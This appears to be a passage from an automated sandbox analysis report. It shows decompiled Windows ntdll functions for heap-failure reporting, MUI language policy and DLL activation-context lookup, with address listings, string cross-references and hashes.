				E04FCB150("Error code: %d - %s\n",  *0x50b5898);
				_t113 =  *0x50b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04FCB150();
					} else {
						E04FCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04FCB150("Parameter1: %p\n",  *0x50b58a4);
				}
				_t115 =  *0x50b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04FCB150();
					} else {
						E04FCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04FCB150("Parameter2: %p\n",  *0x50b58a8);
				}
				_t117 =  *0x50b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04FCB150();
					} else {
						E04FCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04FCB150("Parameter3: %p\n",  *0x50b58ac);
				}
				_t119 =  *0x50b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04FCB150();
					} else {
						E04FCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x50b58b4);
					E04FCB150("Last known valid blocks: before - %p, after - %p\n",  *0x50b58b0);
				} else {
					_t120 =  *0x50b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04FCB150();
				} else {
					E04FCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04FCB150("Stack trace available at %p\n", 0x50b58c0);
			}

0x05081c10
0x05081c16
0x05081c1e
0x05081c3d
0x05081c3e
0x05081c20
0x05081c35
0x05081c3a
0x05081c44
0x05081c55
0x05081c5a
0x05081c65
0x05081c67
0x00000000
0x05081c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x05081c67
0x05081cdc
0x05081ce5
0x05081d04
0x05081d05
0x05081ce7
0x05081cfc
0x05081d01
0x05081d0b
0x05081d17
0x05081d1f
0x05081d25
0x05081d30
0x05081d4f
0x05081d50
0x05081d32
0x05081d47
0x05081d4c
0x05081d61
0x05081d67
0x05081d68
0x05081d6e
0x05081d79
0x05081d98
0x05081d99
0x05081d7b
0x05081d90
0x05081d95
0x05081daa
0x05081db0
0x05081db1
0x05081db7
0x05081dc2
0x05081de1
0x05081de2
0x05081dc4
0x05081dd9
0x05081dde
0x05081df3
0x05081df9
0x05081dfa
0x05081e00
0x05081e0a
0x05081e13
0x05081e32
0x05081e33
0x05081e15
0x05081e2a
0x05081e2f
0x05081e39
0x05081e4a
0x05081e02
0x05081e02
0x05081e08
0x00000000
0x00000000
0x05081e08
0x05081e5b
0x05081e7a
0x05081e7b
0x05081e5d
0x05081e72
0x05081e77
0x05081e95

Strings

heap_failure_lfh_bitmap_mismatch, xrefs: 05081CD7
heap_failure_invalid_argument, xrefs: 05081CAD
heap_failure_internal, xrefs: 05081C6E
Last known valid blocks: before - %p, after - %p, xrefs: 05081E45
Heap error detected at %p (heap handle %p), xrefs: 05081C50
heap_failure_buffer_overrun, xrefs: 05081C98
heap_failure_freelists_corruption, xrefs: 05081CC9
heap_failure_multiple_entries_corruption, xrefs: 05081C8A
HEAP[%wZ]: , xrefs: 05081C30, 05081CF7, 05081D42, 05081D8B, 05081DD4, 05081E25, 05081E6D
heap_failure_block_not_busy, xrefs: 05081CA6
heap_failure_virtual_block_corruption, xrefs: 05081C91
heap_failure_generic, xrefs: 05081C7C
Error code: %d - %s, xrefs: 05081D12
HEAP: , xrefs: 05081C16, 05081C3D, 05081D04, 05081D4F, 05081D98, 05081DE1, 05081E32, 05081E7A
heap_failure_entry_corruption, xrefs: 05081C83
heap_failure_unknown, xrefs: 05081C75
heap_failure_invalid_allocation_type, xrefs: 05081CB4
heap_failure_buffer_underrun, xrefs: 05081C9F
Parameter2: %p, xrefs: 05081DA5
heap_failure_listentry_corruption, xrefs: 05081CD0
heap_failure_cross_heap_operation, xrefs: 05081CC2
heap_failure_usage_after_free, xrefs: 05081CBB
Parameter3: %p, xrefs: 05081DEE
Parameter1: %p, xrefs: 05081D5C
Stack trace available at %p, xrefs: 05081E86

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 25a426c5f25eae17bf45215b398da12b0e83371fc96697bc2bf5c791cfa0623b
Instruction ID: a43448d4b18e3d4c635dd977a0c3f63d8f8b8c9888afa0a14601fe233faee35b
Opcode Fuzzy Hash: 25a426c5f25eae17bf45215b398da12b0e83371fc96697bc2bf5c791cfa0623b
Instruction Fuzzy Hash: 3861C73A964541DFE211AB45F986EBC73E5EF04A30B09807EF48A6B310D624F843CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 04FD3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04FD3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04FD1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04FD1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04FD1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04FD1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04FD1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04FE4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0500F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E05011370(_t276, 0x4fa4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0500BB40(0,  &_v68, _t170);
									if(L04FD43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0500BB40(_t257,  &_v68, _t243);
								if(L04FD43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E05011370(_t278, 0x4fa4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04FE4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0500F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E05011370(_v16, 0x4fa4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0500BB40(_t262,  &_v68, _t244);
								if(L04FD43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E05011370(_t282, 0x4fa4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0500BB40(_t262,  &_v68, _t201);
							if(L04FD43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04FE4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0500F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E05011370(_t280, 0x4fa4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0500BB40(_t267,  &_v68, _t245);
							if(L04FD43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E05011370(_t284, 0x4fa4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0500BB40(_t267,  &_v68, _t224);
						if(L04FD43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x04fd3d3c
0x04fd3d42
0x04fd3d44
0x04fd3d46
0x04fd3d49
0x04fd3d4c
0x04fd3d4f
0x04fd3d52
0x04fd3d55
0x04fd3d58
0x04fd3d5b
0x04fd3d5f
0x04fd3d61
0x04fd3d66
0x05028213
0x05028218
0x04fd4085
0x04fd4088
0x04fd408e
0x04fd4094
0x04fd409a
0x04fd40a0
0x04fd40a6
0x04fd40a9
0x04fd40af
0x04fd40b6
0x04fd40bd
0x04fd40bd
0x04fd3d83
0x0502821f
0x05028229
0x05028238
0x05028238
0x0502823d
0x0502823d
0x04fd3da0
0x04fd3daf
0x04fd3db5
0x04fd3dba
0x04fd3dba
0x04fd3dd4
0x04fd3e94
0x04fd3eab
0x04fd3f6d
0x04fd3f84
0x04fd406b
0x04fd406b
0x04fd406e
0x04fd406e
0x04fd4070
0x04fd4074
0x05028351
0x05028351
0x04fd407a
0x04fd407f
0x0502835d
0x05028370
0x05028377
0x05028379
0x0502837c
0x0502837c
0x0502835d
0x00000000
0x04fd407f
0x04fd3f8a
0x04fd3f8d
0x04fd3f90
0x04fd3f95
0x0502830d
0x0502830f
0x04fd3f9b
0x04fd3fac
0x04fd3fae
0x04fd3fb1
0x04fd3fb1
0x04fd3fb6
0x05028317
0x0502831a
0x00000000
0x04fd3fbc
0x04fd3fc1
0x04fd3fc9
0x04fd3fd7
0x04fd3fda
0x04fd3fdd
0x04fd4021
0x04fd4021
0x04fd4029
0x04fd4030
0x04fd4044
0x04fd4046
0x04fd4046
0x04fd4044
0x04fd4049
0x05028327
0x05028334
0x05028339
0x0502833c
0x04fd404f
0x04fd404f
0x04fd404f
0x04fd4051
0x04fd4056
0x04fd4063
0x04fd4063
0x04fd4068
0x00000000
0x04fd4068
0x04fd3fdf
0x04fd3fe2
0x04fd3fe4
0x04fd3fe7
0x04fd3fef
0x04fd4003
0x04fd4005
0x04fd4005
0x04fd400c
0x04fd4013
0x04fd4016
0x04fd4017
0x04fd401b
0x04fd401e
0x00000000
0x04fd401e
0x04fd3fb6
0x04fd3eb1
0x04fd3eb4
0x04fd3eb7
0x04fd3ebc
0x050282a9
0x050282ab
0x04fd3ec2
0x04fd3ed3
0x04fd3ed5
0x04fd3ed8
0x04fd3ed8
0x04fd3edd
0x050282b3
0x050282b6
0x00000000
0x04fd3ee3
0x04fd3ee8
0x04fd3eed
0x04fd3ef0
0x04fd3ef3
0x04fd3f02
0x04fd3f05
0x04fd3f08
0x050282c0
0x050282c3
0x050282c5
0x050282c8
0x050282d0
0x050282e4
0x050282e6
0x050282e6
0x050282ed
0x050282f4
0x050282f7
0x050282f8
0x050282fc
0x050282ff
0x050282ff
0x04fd3f0e
0x04fd3f11
0x04fd3f16
0x04fd3f1d
0x04fd3f31
0x05028307
0x05028307
0x04fd3f31
0x04fd3f39
0x04fd3f48
0x04fd3f4d
0x04fd3f50
0x04fd3f50
0x04fd3f53
0x04fd3f58
0x04fd3f65
0x04fd3f65
0x04fd3f6a
0x00000000
0x04fd3f6a
0x04fd3edd
0x04fd3dda
0x04fd3ddd
0x04fd3de0
0x04fd3de5
0x05028245
0x04fd3deb
0x04fd3df7
0x04fd3dfc
0x04fd3dfe
0x04fd3e01
0x04fd3e01
0x04fd3e06
0x0502824d
0x0502824f
0x05028254
0x00000000
0x04fd3e0c
0x04fd3e11
0x04fd3e16
0x04fd3e19
0x04fd3e29
0x04fd3e2c
0x04fd3e2f
0x0502825c
0x0502825f
0x05028261
0x05028264
0x0502826c
0x05028280
0x05028282
0x05028282
0x05028289
0x05028290
0x05028293
0x05028294
0x05028298
0x0502829b
0x0502829b
0x04fd3e35
0x04fd3e38
0x04fd3e3d
0x04fd3e44
0x04fd3e58
0x050282a3
0x050282a3
0x04fd3e58
0x04fd3e60
0x04fd3e6f
0x04fd3e74
0x04fd3e77
0x04fd3e77
0x04fd3e7a
0x04fd3e7f
0x04fd3e8c
0x04fd3e8c
0x04fd3e91
0x00000000
0x04fd3e91

Strings

Kernel-MUI-Language-SKU, xrefs: 04FD3F70
WindowsExcludedProcs, xrefs: 04FD3D6F
Kernel-MUI-Language-Disallowed, xrefs: 04FD3E97
Kernel-MUI-Number-Allowed, xrefs: 04FD3D8C
Kernel-MUI-Language-Allowed, xrefs: 04FD3DC0

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 25f58c5d8e818803c743e75023708d8c3ed80818b5c1ebbaad62c44e82f64cf7
Instruction ID: c901314bd07732a178bd909899224e3af0c850de28cd63ab0db342ba9d940339
Opcode Fuzzy Hash: 25f58c5d8e818803c743e75023708d8c3ed80818b5c1ebbaad62c44e82f64cf7
Instruction Fuzzy Hash: 19F15076D00218EFDB15DF98D9849EEBBF9FF08650F18406AE905E7251E770AE02CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04FF8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04FF8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x50bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x50b8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x50b5780 & 0x00000003) != 0) {
							E05045510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x50b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0500B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x50b7984; // 0x3202ab8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x50b8464; // 0x74b10110
					 *0x50bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04FF9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x50b5780 & 0x00000005) != 0) {
						_push(_t49);
						E05045510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x04ff8e0f
0x04ff8e16
0x04ff8e19
0x04ff8e1b
0x04ff8e21
0x04ff8e7f
0x04ff8e85
0x05039354
0x0503936c
0x05039371
0x0503937b
0x05039381
0x05039381
0x0503937b
0x04ff8e9d
0x04ff8e9d
0x04ff8e29
0x04ff8e2c
0x04ff8e38
0x04ff8e3e
0x04ff8e43
0x04ff8eb5
0x04ff8eb9
0x050392aa
0x050392af
0x050392e8
0x050392e8
0x050392af
0x04ff8eb9
0x04ff8e45
0x04ff8e53
0x04ff8e5b
0x04ff8e5f
0x04ff8e78
0x04ff8e78
0x04ff8e7d
0x04ff8ec3
0x04ff8ecd
0x04ff8ed2
0x04ff8ed2
0x04ff8ec5
0x04ff8ec5
0x00000000
0x04ff8e7d
0x04ff8e67
0x04ff8ea4
0x0503931a
0x00000000
0x00000000
0x05039320
0x04ff8ea4
0x04ff8e70
0x05039325
0x05039340
0x05039345
0x05039345
0x04ff8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0503932A
minkernel\ntdll\ldrsnap.c, xrefs: 0503933B, 05039367
Querying the active activation context failed with status 0x%08lx, xrefs: 05039357
LdrpFindDllActivationContext, xrefs: 05039331, 0503935D

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 75885a6e7362305aafeb70bfc9900609f50401dd8e8d076fd88b8df7239539c0
Instruction ID: bcd5b93267514d38885fd18bde070124708b006b472124f34f490868b3ed9a0a
Opcode Fuzzy Hash: 75885a6e7362305aafeb70bfc9900609f50401dd8e8d076fd88b8df7239539c0
Instruction Fuzzy Hash: 86410672F403119FDB35BE94DCCDB7DB6A5AF01784F094569EA1457170EB60BC828681

Uniqueness

Uniqueness Score: -1.00%

Function 04FD8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E04FD8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E04FD934A() != 0) {
								_t159 = E0504A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x50b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E05045510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x50b5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E04FD849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04FD8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04FD8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x50b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x50b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04FE2280(_t92, 0x50b86cc);
															_t94 = E05099DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E04FF61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x50b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04FD8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
